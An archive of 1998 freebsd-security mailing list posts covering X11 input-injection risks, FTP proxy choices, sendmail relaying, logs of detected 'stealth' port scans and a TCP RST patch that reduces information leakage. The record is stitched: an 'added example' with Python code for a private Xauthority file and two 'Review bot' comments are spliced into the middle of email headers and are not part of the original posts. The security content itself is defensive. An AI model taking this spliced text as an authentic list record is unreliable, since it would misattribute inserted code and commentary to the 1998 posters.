fact there were 3 ways to get keystrokes and mouse movements to X. a2x
can use any of them. I don't remember what they are off hand, but I do
remember that there were 3 different methods depending on the X server.

For those of you that don't know what a2x is, it's an interface for
using voice recognition software to control X on your workstation. It
mainly works with DragonDictate, but I think that you can get it to work
with any voice recognition software. I fooled around with it a few months
ago when I had tendinitis and was restricting the amount of typing I
did.....

On Wed, 16 Sep 1998, Warner Losh wrote:

> In message <199809152125.WAA01218@indigo.ie> Niall Smart writes:
> : Actually, xterm will not accept synthetically generated keystrokes
> : from XSendEvent by default, but there is nothing stopping someone
> : from capturing keystrokes and other events. This is a pretty
> : pedantic point, anyone using xhost to manage X security deserves
> : to get stung.
>
> But it will accept keystrokes generated from XTEST by default. I have
> a Newton keyboard I use with my Libretto which uses this feature. It
> would appear that the keystroke program even works with a remote
> display I can connect to, which is both way cool and a possible
> nightmare from a security point of view. XTEST even supports mouse
> movements and clicking, which I plan to add to the Newton keyboard
> just as soon as I find a way of faking mice that I like. There are
> several X extensions that can be used here that are compiled into
> XFree86 by default.
> I think they are XInputExtension, XKEYBOARD and
> XTEST, but I'm not sure about XKEYBOARD.
>
> There is even a RECORD extension listed on my xdpyinfo output that
> looks like it could be very interesting indeed.
>
> X security is less like Swiss cheese, and more like chicken wire if
> you are just using xhost for your security.
>
> Warner

---------------------------------------------
The devil finds work for idle circuits to do.
---------------------------------------------
zoonie at myhouse dot com

From owner-freebsd-security Wed Sep 16 14:42:03 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA13213 for freebsd-security-outgoing; Wed, 16 Sep 1998 14:42:03 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA13116; Wed, 16 Sep 1998 14:41:16 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu)
Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id RAA09975; Wed, 16 Sep 1998 17:40:40 -0400 (EDT)
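Two points from the X security thread above fit together: Wes Peters' quoted warning that anyone who can read the cookie file can connect, and Robert Watson's Xnest arrangement, which hands Xnest a `-auth` file holding a cookie nobody else should have. As an added example (not code from any poster, from XFree86 or from libXau), the Python below writes a fresh MIT-MAGIC-COOKIE-1 record for the nested display in the Xauthority file layout (family as a big-endian 16-bit integer, then address, display number, name and data, each as a big-endian 16-bit length followed by the bytes), creates the file O_EXCL with mode 0600 so there is never a window in which it is readable by others, and parses it back with bounds checks. The display number, host name and file location are assumptions.

```python
"""Write and read a private Xauthority file for a nested (Xnest) display.

Added example for the X security thread; not code from the posters,
XFree86 or libXau.  Record layout: family (u16 BE), then address, number,
name, data, each as u16 BE length + bytes.  Display, host and path are
assumptions for the example.
"""
import os
import secrets
import socket
import stat
import struct
import tempfile
from typing import List, Optional, Tuple

FAMILY_LOCAL = 256                     # FamilyLocal: "address" is the host name
MIT_MAGIC_COOKIE_1 = b"MIT-MAGIC-COOKIE-1"
COOKIE_LEN = 16


def _field(data: bytes) -> bytes:
    """One Xauthority field: big-endian uint16 length followed by the bytes."""
    return struct.pack(">H", len(data)) + data


def make_entry(display: int, cookie: bytes, host: Optional[bytes] = None) -> bytes:
    """Serialize one record: family, address, number, name, data."""
    if len(cookie) != COOKIE_LEN:
        raise ValueError("MIT-MAGIC-COOKIE-1 cookies are 16 bytes")
    if host is None:
        host = socket.gethostname().encode()
    return (struct.pack(">H", FAMILY_LOCAL)
            + _field(host)
            + _field(str(display).encode())
            + _field(MIT_MAGIC_COOKIE_1)
            + _field(cookie))


def parse_entries(blob: bytes) -> List[dict]:
    """Parse every record in an Xauthority file; truncated input is rejected, not guessed at."""
    entries, pos = [], 0

    def take_u16() -> int:
        nonlocal pos
        if pos + 2 > len(blob):
            raise ValueError("truncated Xauthority record")
        (n,) = struct.unpack_from(">H", blob, pos)
        pos += 2
        return n

    def take_field() -> bytes:
        nonlocal pos
        n = take_u16()
        if pos + n > len(blob):
            raise ValueError("truncated Xauthority field")
        data = blob[pos:pos + n]
        pos += n
        return data

    while pos < len(blob):
        family = take_u16()
        entries.append({"family": family, "address": take_field(),
                        "number": take_field(), "name": take_field(),
                        "data": take_field()})
    return entries


def write_private_authfile(path: str, display: int, host: Optional[bytes] = None) -> bytes:
    """Create path holding a fresh random cookie for :display; return the cookie.

    O_EXCL stops anyone from pre-creating the file, and the 0600 mode is
    applied at creation, so the cookie is never readable by another user.
    """
    cookie = secrets.token_bytes(COOKIE_LEN)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(make_entry(display, cookie, host))
    return cookie


def is_private(path: str) -> bool:
    """True if the auth file is a regular file with no group/other permission bits."""
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and (stat.S_IMODE(st.st_mode) & 0o077) == 0


def new_authfile_in_tempdir(display: int = 1) -> Tuple[str, bytes]:
    """A private auth file inside a fresh 0700 directory (mkdtemp)."""
    path = os.path.join(tempfile.mkdtemp(prefix="xnest-"), "xnest.auth")
    return path, write_private_authfile(path, display)


if __name__ == "__main__":
    # With the file this produces, Watson's arrangement becomes (not run here):
    #   Xnest :1 -auth $AUTHFILE &
    #   XAUTHORITY=$AUTHFILE xterm -display :1 -e slogin -l username hostname
    authfile, cookie = new_authfile_in_tempdir(1)
    print("AUTHFILE=%s cookie=%s private=%s" % (authfile, cookie.hex(), is_private(authfile)))
```

The xterm needs XAUTHORITY pointed at the same file so it can present the cookie to Xnest; the outer display's ~/.Xauthority never learns it, which is what keeps a compromise of the nested session from reaching the real display.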
From: "Allen Smith" Message-Id: <9809161740.ZM9973@beatrice.rutgers.edu> Date: Wed, 16 Sep 1998 17:40:39 -0400 X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: isp@FreeBSD.ORG, security@FreeBSD.ORG Subject: Copyleft/BSD Copyright FTP Proxy Software Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi. Anybody know of any good Copyleft or BSD Copyright FTP Proxy Software? SOCKS version 4 is no longer being supported by its developers, so far as I can tell. Thanks, -Allen P.S. I'm wanting copyleft or BSD copyright because those tend to get security and other fixes a lot faster, plus I have in mind some improvements to the normal proxy server functions that I'd like to be able to distribute. -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 15:59:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA01837 for freebsd-security-outgoing; Wed, 16 Sep 1998 15:59:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA01670; Wed, 16 Sep 1998 15:58:33 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id SAA22360; Wed, 16 Sep 1998 18:57:57 -0400 (EDT) 
From: "Allen Smith" Message-Id: <9809161857.ZM22358@beatrice.rutgers.edu> Date: Wed, 16 Sep 1998 18:57:56 -0400 In-Reply-To: Scott Morris "Re: Copyleft/BSD Copyright FTP Proxy Software" (Sep 16, 6:48pm) References: X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: isp@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: Copyleft/BSD Copyright FTP Proxy Software Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm sorry, I didn't specify sufficiently. We're needing to support FTP PUTs, so squid won't work (even if it wasn't for browsers, not command line FTP programs). We're about to be using FreeBSD for a firewall for IRIX machines, and the Socks version 4, as well as not being supported currently (or at least not well supported), doesn't work right on IRIX. I've asked on the Socks mailing list about this problem, and the only reply I got was to go to the (restrictively copyrighted) version of Socks 5. Incidentally, if there's one out there that'll do well, I'm willing to try making the proxy server portion of it into a port. 
Thanks, -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 18:13:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA02689 for freebsd-security-outgoing; Wed, 16 Sep 1998 18:13:40 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from duey.hs.wolves.k12.mo.us (duey.hs.wolves.k12.mo.us [207.160.214.9]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA02558; Wed, 16 Sep 1998 18:12:43 -0700 (PDT) (envelope-from cdillon@wolves.k12.mo.us) Received: from duey.hs.wolves.k12.mo.us (cdillon@duey.hs.wolves.k12.mo.us [207.160.214.9]) by duey.hs.wolves.k12.mo.us (8.8.7/8.8.7) with SMTP id UAA14971; Wed, 16 Sep 1998 20:12:14 -0500 (CDT) (envelope-from cdillon@wolves.k12.mo.us) Date: Wed, 16 Sep 1998 20:12:14 -0500 (CDT) 
From: Chris Dillon X-Sender: cdillon@duey.hs.wolves.k12.mo.us To: Allen Smith cc: isp@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: Copyleft/BSD Copyright FTP Proxy Software In-Reply-To: <9809161740.ZM9973@beatrice.rutgers.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 16 Sep 1998, Allen Smith wrote: > Hi. Anybody know of any good Copyleft or BSD Copyright FTP Proxy > Software? SOCKS version 4 is no longer being supported by its > developers, so far as I can tell. > > Thanks, > > -Allen > > P.S. I'm wanting copyleft or BSD copyright because those tend to get > security and other fixes a lot faster, plus I have in mind some > improvements to the normal proxy server functions that I'd like to be > able to distribute. > > -- > Allen Smith easmith@beatrice.rutgers.edu > The Squid Proxy and Object Cache handles both HTTP and FTP proxy and caching. It exists in the FreeBSD ports collection and more info can be found at http://squid.nlanr.net. It is in my experience a very good solution, and apparently very popular. -- Chris Dillon - cdillon@wolves.k12.mo.us - cdillon@inter-linc.net /* FreeBSD: The fastest and most stable server OS on the planet. 
For Intel x86 and compatibles (SPARC and Alpha under development) (http://www.freebsd.org) */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 18:14:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA02912 for freebsd-security-outgoing; Wed, 16 Sep 1998 18:14:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from duey.hs.wolves.k12.mo.us (duey.hs.wolves.k12.mo.us [207.160.214.9]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA02822; Wed, 16 Sep 1998 18:14:06 -0700 (PDT) (envelope-from cdillon@wolves.k12.mo.us) Received: from duey.hs.wolves.k12.mo.us (cdillon@duey.hs.wolves.k12.mo.us [207.160.214.9]) by duey.hs.wolves.k12.mo.us (8.8.7/8.8.7) with SMTP id UAA14976; Wed, 16 Sep 1998 20:13:38 -0500 (CDT) (envelope-from cdillon@wolves.k12.mo.us) Date: Wed, 16 Sep 1998 20:13:37 -0500 (CDT) 
From: Chris Dillon X-Sender: cdillon@duey.hs.wolves.k12.mo.us To: Allen Smith cc: isp@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: Copyleft/BSD Copyright FTP Proxy Software In-Reply-To: <9809161857.ZM22358@beatrice.rutgers.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 16 Sep 1998, Allen Smith wrote: > I'm sorry, I didn't specify sufficiently. We're needing to support FTP > PUTs, so squid won't work (even if it wasn't for browsers, not command > line FTP programs). We're about to be using FreeBSD for a firewall for > IRIX machines, and the Socks version 4, as well as not being supported > currently (or at least not well supported), doesn't work right on > IRIX. I've asked on the Socks mailing list about this problem, and the > only reply I got was to go to the (restrictively copyrighted) version > of Socks 5. Incidentally, if there's one out there that'll do well, > I'm willing to try making the proxy server portion of it into a port. > > Thanks, > > -Allen > > -- > Allen Smith easmith@beatrice.rutgers.edu Hmmph.. Teach me to not read ahead for relevant replies or "errata" before I post. :-) -- Chris Dillon - cdillon@wolves.k12.mo.us - cdillon@inter-linc.net /* FreeBSD: The fastest and most stable server OS on the planet. 
For Intel x86 and compatibles (SPARC and Alpha under development) (http://www.freebsd.org) */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 18:49:47 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA10831 for freebsd-security-outgoing; Wed, 16 Sep 1998 18:49:47 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hillbilly.hayseed.net (hillbilly.hayseed.net [204.62.130.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA10809; Wed, 16 Sep 1998 18:49:36 -0700 (PDT) (envelope-from enkhyl@hayseed.net) Received: from hillbilly.hayseed.net (hillbilly.hayseed.net [204.62.130.2]) by hillbilly.hayseed.net (8.9.1/8.8.5) with SMTP id SAA25544; Wed, 16 Sep 1998 18:49:04 -0700 Date: Wed, 16 Sep 1998 18:49:04 -0700 (PDT) 
From: Enkhyl
To: Chris Dillon
cc: Allen Smith , isp@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: Copyleft/BSD Copyright FTP Proxy Software
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 16 Sep 1998, Chris Dillon wrote:

> On Wed, 16 Sep 1998, Allen Smith wrote:
>
> > Hi. Anybody know of any good Copyleft or BSD Copyright FTP Proxy
> > Software? SOCKS version 4 is no longer being supported by its
> > developers, so far as I can tell.
> >
> > Thanks,
> >
> > -Allen
> >
> > P.S. I'm wanting copyleft or BSD copyright because those tend to get
> > security and other fixes a lot faster, plus I have in mind some
> > improvements to the normal proxy server functions that I'd like to be
> > able to distribute.
> >
> > --
> > Allen Smith easmith@beatrice.rutgers.edu
>
> The Squid Proxy and Object Cache handles both HTTP and FTP proxy and
> caching. It exists in the FreeBSD ports collection and more info can be
> found at http://squid.nlanr.net. It is in my experience a very good
> solution, and apparently very popular.

This is fine if you don't mind massive buffer overflow potential. Squid is
not what I would call a security-minded piece of software.

Just my $0.02 from perusing the source.
-- Christopher Nielsen Scient: The Art and Science of Electronic Business cnielsen@scient.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 19:14:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA13989 for freebsd-security-outgoing; Wed, 16 Sep 1998 19:14:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA13962; Wed, 16 Sep 1998 19:14:17 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id WAA14229; Wed, 16 Sep 1998 22:13:45 -0400 (EDT) 
From: "Allen Smith" Message-Id: <9809162213.ZM14227@beatrice.rutgers.edu> Date: Wed, 16 Sep 1998 22:13:45 -0400 In-Reply-To: Enkhyl "Re: Copyleft/BSD Copyright FTP Proxy Software" (Sep 16, 9:49pm) References: X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: Enkhyl , Chris Dillon Subject: Re: Copyleft/BSD Copyright FTP Proxy Software Cc: isp@FreeBSD.ORG, security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sep 16, 9:49pm, Enkhyl (possibly) wrote: > On Wed, 16 Sep 1998, Chris Dillon wrote: > > The Squid Proxy and Object Cache handles both HTTP and FTP proxy and > > caching. It exists in the FreeBSD ports collection and more info can be > > found at http://squid.nlanr.net. It is in my experience a very good > > solution, and apparently very popular. > > This is fine if you don't mind massive buffer overflow potential. Squid is > not what I would call a security-minded piece of software. > > Just my $0.02 from perusing the source. The 1.2 version, albeit less stable than the 1.1 version, is improved in this respect, such as via replacing sprintf with snprintf. I'm planning on compiling any FTP proxy with libparanoia or similar in any event. 
-Allen

--
Allen Smith easmith@beatrice.rutgers.edu

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Sep 16 20:24:51 1998

From: john
Message-Id: <199809170319.WAA18072@leonardo.cascss.unt.edu>
Subject: Are we vulnerable to "stealth" port scans?
To: freebsd-security@FreeBSD.ORG
Date: Wed, 16 Sep 1998 22:19:29 -0500 (CDT)

See http://www.2600.com/phrack/p49-15.html
for a description of two "stealth" port
scan methods.

From owner-freebsd-security Wed Sep 16 21:29:06 1998

Date: Wed, 16 Sep 1998 21:27:39 -0700 (PDT)
From: Everett Batey
Message-Id: <199809170427.VAA12368@vcd.com>
To: questions@FreeBSD.ORG, security@FreeBSD.ORG
Subject: How do I get rid of Relaying on FBSD 2.1.6
Cc: admin@vcd.com

We are running FreeBSD 2.1.6 .. Sendmail 8.8.3 and being destroyed
continuously .. I am not ready to go to Qmail on this site .. Is there
any RULE for "I WONT FORWARD these_guys" from or to .. H E L P ...

/Everett/

These qf and df files ..

... is a MIME-encapsulated message

--VAK12188.906005236/vcd.com

The original message was received at Fri, 11 Sep 1998 20:33:57 -0700 (PDT)
from sdn-ar-001flfmyeP260.dialsprint.net [168.191.85.150]

   ----- The following addresses had permanent fatal errors -----

   ----- Transcript of session follows -----
451 ... surfree.net: Name server timeout
451 ... surfree.net: Name server timeout
451 ... surfree.net: Name server timeout
... while talking to ya.mx.aol.com.:
>>> MAIL From: SIZE=1514
<<< 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18).
From owner-freebsd-security Wed Sep 16 23:44:27 1998

Date: Wed, 16 Sep 1998 23:43:55 -0700 (PDT)
From: "Jan B. Koum "
To: john
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Are we vulnerable to "stealth" port scans?
In-Reply-To: <199809170319.WAA18072@leonardo.cascss.unt.edu>

	I wouldn't use the word "vulnerable", but yes, most TCP stacks will
in one way or another respond to Stealth scans.
On my system I modified the kernel to log via the net.inet.tcp.log_in_vain
sysctl variable not only SYN packets but all other packets. If someone were
to do this stealth scan on you, you could still notice:

Sep 11 22:58:50 twentythree /kernel: Connection attempt to TCP 199.51.61.23:1 from 199.51.61.22:1<6>FIN<6>RST<6>PUSH<6>URG<6>

Sep 11 22:58:50 twentythree /kernel: Connection attempt to TCP 199.51.61.23:1 from 199.51.61.22:1<6>RST<6>

Sep 11 22:58:50 twentythree /kernel: Connection attempt to TCP 199.51.61.23:1 from 199.51.61.22:1<6>ACK<6>FIN<6>RST<6>URG<6>

	Also, one can set up something like NFR to watch for port scans on
the network.

-- Yan

I don't have the password .... + Jan Koum
But the path is chainlinked .. | Spelled Jan, pronounced Yan. There.
So if you've got the time .... | Web: http://www.best.com/~jkb
Set the tone to sync ......... + OS: http://www.FreeBSD.org

On Wed, 16 Sep 1998, john wrote:

>See http://www.2600.com/phrack/p49-15.html
>for a description of two "stealth" port
>scan methods.

From owner-freebsd-security Thu Sep 17 00:44:18 1998

To: "Jan B. Koum "
cc: john , freebsd-security@FreeBSD.ORG
Subject: Re: Are we vulnerable to "stealth" port scans?
In-reply-to: Your message of "Wed, 16 Sep 1998 23:43:55 PDT."
Date: Thu, 17 Sep 1998 09:38:05 +0200
Message-ID: <8631.906017885@critter.freebsd.dk>
From: Poul-Henning Kamp

patches ?

In message , "Jan B. Koum " writes:
>
> I wouldn't use the word "vulnerable", but yes, most TCP stacks
>will in one way or another respond to Steal scans. On my system I modifed
>kernel to log via net.inet.tcp.log_in_vain sysctl variable not only SYN
>packets but all other packets. If someone would be to do this stealth scan
>on you, you could still notice:
>
>Sep 11 22:58:50 twentythree /kernel: Connection attempt to TCP
>199.51.61.23:1 from 199.51.61.22:1<6>FIN<6>RST<6>PUSH<6>URG<6>
>
>Sep 11 22:58:50 twentythree /kernel: Connection attempt to TCP
>199.51.61.23:1 from 199.51.61.22:1<6>RST<6>
>
>Sep 11 22:58:50 twentythree /kernel: Connection attempt to TCP
>199.51.61.23:1 from 199.51.61.22:1<6>ACK<6>FIN<6>RST<6>URG<6>
>
> Also, one can setup something like NFR to watch for port scans on
>the network.
>
>-- Yan
>
>I don't have the password .... + Jan Koum
>But the path is chainlinked .. | Spelled Jan, pronounced Yan. There.
>So if you've got the time .... | Web: http://www.best.com/~jkb
>Set the tone to sync ......... + OS: http://www.FreeBSD.org
>
>On Wed, 16 Sep 1998, john wrote:
>
>>See http://www.2600.com/phrack/p49-15.html
>>for a description of two "stealth" port
>>scan methods.
>>

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
"ttyv0" -- What UNIX calls a $20K state-of-the-art, 3D, hi-res color terminal

From owner-freebsd-security Thu Sep 17 02:08:44 1998

Message-ID: <19980917111240.62789@deepo.prosa.dk>
Date: Thu, 17 Sep 1998 11:12:40 +0200
From: Philippe Regnauld
To: Everett Batey
Cc: questions@FreeBSD.ORG, security@FreeBSD.ORG, admin@vcd.com
Subject: Re: How do I get rid of Relaying on FBSD 2.1.6
References: <199809170427.VAA12368@vcd.com>
In-Reply-To: <199809170427.VAA12368@vcd.com>; from Everett Batey on Wed, Sep 16, 1998 at 09:27:39PM -0700

Everett Batey writes:
>
> We are running FreeBSD 2.1.6 .. Sendmail 8.8.3 and being destroyed
> continuously ..
> I am not ready to go to Qmail on this site .. Is there
> any RULE for "I WONT FORWARD these_guys" from or to .. H E L P ...

	Sendmail 8.9 -- can be conf'ed to only relay the hosts for which
	you are declared MX.

	Sendmail 8.8.x -- see www.sendmail.org -- lots o' rulesets et al.

--
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
	The Internet is busy. Please try again later.

From owner-freebsd-security Thu Sep 17 04:34:25 1998

Date: Thu, 17 Sep 1998 23:33:35 +1200 (NZST)
From: Andrew McNaughton
Reply-To: andrew@squiz.co.nz
To: Allen Smith
cc: isp@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: Copyleft/BSD Copyright FTP Proxy Software
In-Reply-To: <9809161857.ZM22358@beatrice.rutgers.edu>

On Wed, 16 Sep 1998, Allen Smith wrote:

> I'm sorry, I didn't specify sufficiently. We're needing to support FTP
> PUTs, so squid won't work (even if it wasn't for browsers, not command
> line FTP programs). We're about to be using FreeBSD for a firewall for
> IRIX machines, and the Socks version 4, as well as not being supported
> currently (or at least not well supported), doesn't work right on
> IRIX.
> I've asked on the Socks mailing list about this problem, and the
> only reply I got was to go to the (restrictively copyrighted) version
> of Socks 5. Incidentally, if there's one out there that'll do well,
> I'm willing to try making the proxy server portion of it into a port.

delegated in the ports collection provides FTP PUT along with a wide range
of other proxy services. It won't give you the performance of squid. I
haven't looked at its source or heard any comments on its security.

Andrew

From owner-freebsd-security Thu Sep 17 04:34:54 1998

Message-Id: <199809171134.EAA22203@hub.freebsd.org>
From: Darren Reed
Subject: Re: Are we vulnerable to "stealth" port scans?
To: phk@critter.freebsd.dk (Poul-Henning Kamp)
Date: Thu, 17 Sep 1998 21:27:13 +1000 (EST)
Cc: jkb@best.com, john@unt.edu, freebsd-security@FreeBSD.ORG
In-Reply-To: <8631.906017885@critter.freebsd.dk> from "Poul-Henning Kamp" at Sep 17, 98 09:38:05 am

In some mail from Poul-Henning Kamp, sie said:
>
>
> patches ?

hmmm, see if you can track down the code which makes the replies sent back
different - i.e. all RST's go back with fields filled in by what was
received.
The problem is leakage of internal information DEPENDING (<- which is what
makes it possible) on what state (if any) the socket which matches the packet
used to scan with.

darren

From owner-freebsd-security Thu Sep 17 05:47:06 1998

From: Darren Reed
Message-Id: <199809171245.WAA03566@avalon.reed.wattle.id.au>
Subject: Making "stealth" scans harder.
To: darrenr@reed.wattle.id.au (Darren Reed)
Date: Thu, 17 Sep 1998 22:45:49 +1000 (EST)

The below patch helps to reduce the leakage of internal socket information
when a TCP "stealth" scan is directed at a *BSD box by ensuring the window
is 0 for all RST packets generated through tcp_respond(). Patch is against
NetBSD-1.3G but should apply to others with some fuzz.
Cheers, Darren *** tcp_subr.c.orig Sun Aug 2 21:16:42 1998 --- tcp_subr.c Thu Sep 17 22:38:51 1998 *************** *** 214,220 **** struct route *ro = 0; if (tp) { ! win = sbspace(&tp->t_inpcb->inp_socket->so_rcv); ro = &tp->t_inpcb->inp_route; } if (m == 0) { --- 214,221 ---- struct route *ro = 0; if (tp) { ! if (!(flags & TH_RST)) ! win = sbspace(&tp->t_inpcb->inp_socket->so_rcv); ro = &tp->t_inpcb->inp_route; } if (m == 0) { *************** *** 247,253 **** ti->ti_ack = htonl(ack); ti->ti_x2 = 0; if ((flags & TH_SYN) == 0) { ! if (tp) ti->ti_win = htons((u_int16_t) (win >> tp->rcv_scale)); else ti->ti_win = htons((u_int16_t)win); --- 248,254 ---- ti->ti_ack = htonl(ack); ti->ti_x2 = 0; if ((flags & TH_SYN) == 0) { ! if (tp && !(flags & TH_RST)) ti->ti_win = htons((u_int16_t) (win >> tp->rcv_scale)); else ti->ti_win = 0; To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 17 13:20:47 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA18283 for freebsd-security-outgoing; Thu, 17 Sep 1998 13:20:47 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA18204 for ; Thu, 17 Sep 1998 13:20:33 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id QAA23714; Thu, 17 Sep 1998 16:19:52 -0400 (EDT) From: "Allen Smith" Message-Id: <9809171619.ZM23712@beatrice.rutgers.edu> Date: Thu, 17 Sep 1998 16:19:52 -0400 In-Reply-To: Alexandre Snarskii "Re: The 99,999-bug question: Why can you execute from the stack?" 
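Review bot: in the first hunk (`*** 214,220 ****`), `win` is now left untouched when `flags & TH_RST` is set, so it keeps whatever value it had before the `if (tp)` block; that initializer is outside the hunk, so confirm it is zero-initialised there, otherwise an RST could carry an uninitialised window. Note also that once the second hunk is applied this change no longer affects the wire format, because the RST path there writes `ti->ti_win = 0` without consulting `win`; the first hunk only matters if `win` is read somewhere else in tcp_respond().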
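Review bot: in the second hunk (`*** 247,253 ****`), the `else` branch now writes `ti->ti_win = 0` for every non-SYN response that has no `tp`, not just RSTs, where the old code used `htons((u_int16_t)win)`; that is a no-op only if `win` is always 0 whenever `tp` is NULL, which the hunk does not show and should be confirmed. The `tp && !(flags & TH_RST)` test also deserves a one-line comment saying that RSTs deliberately advertise a zero window so the matched socket's receive-buffer space is not disclosed, since without it the next reader will take the condition for a bug.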
(Jul 20, 9:42am)
References: <199807200102.SAA07953@bubba.whistle.com> <199807200148.TAA07794@harmony.village.org> <9807192209.ZM23527@beatrice.rutgers.edu> <19980720173800.17978@nevalink.ru>
To: Alexandre Snarskii , Warner Losh
Subject: Re: The 99,999-bug question: Why can you execute from the stack?
Cc: security@FreeBSD.ORG

On Jul 20, 9:42am, Alexandre Snarskii (possibly) wrote:
>
> On Sun, Jul 19, 1998 at 10:09:29PM -0400, Allen Smith wrote:
> > I'd suggest adding anything executing with an effective uid of root;
> > keep in mind servers. I've actually worked on this with the
> > libparanoia's libc substitution, at least with the non-assembler ones;
> > I'll try to find the time to test soon whether this actually speeds
> > things up.
>
> Better approach is (every suid/sgid program) or ( euid == 0 ).
> Patch to libparanoia/stentry.c attached. ( You have no need to
> patch any other file - all checks are in stentry.c, others is just
> standard files from /usr/src/lib/libc, just calls to stentry.c functions
> added ).
> Patched libparanoia available at
> ftp://ftp.lexa.ru/pub/domestic/snar/libparanoia.1.1.tgz

Sorry about the delay on replying to this; I've been busy. While this
is a nicer way to do this in many ways, I am concerned about whether the
delay from calling the libparanoia checks is from the function call or
from what the function does. If the latter, fine; if the former, the
problem I was working on (avoiding the slowdown except when really
needed) still exists. Any idea which is the case? (Of course, there's
also the time taken in doing the issetugid and geteuid checks in
either case, whether one has them in the individual functions or in
stentry.c.) If need be, I'll try some profiling, but I'd prefer to
avoid that if someone already knows the answer.
Thanks,

-Allen

--
Allen Smith easmith@beatrice.rutgers.edu

From owner-freebsd-security Thu Sep 17 13:29:23 1998

Message-Id: <199809172029.OAA19373@harmony.village.org>
To: "Allen Smith"
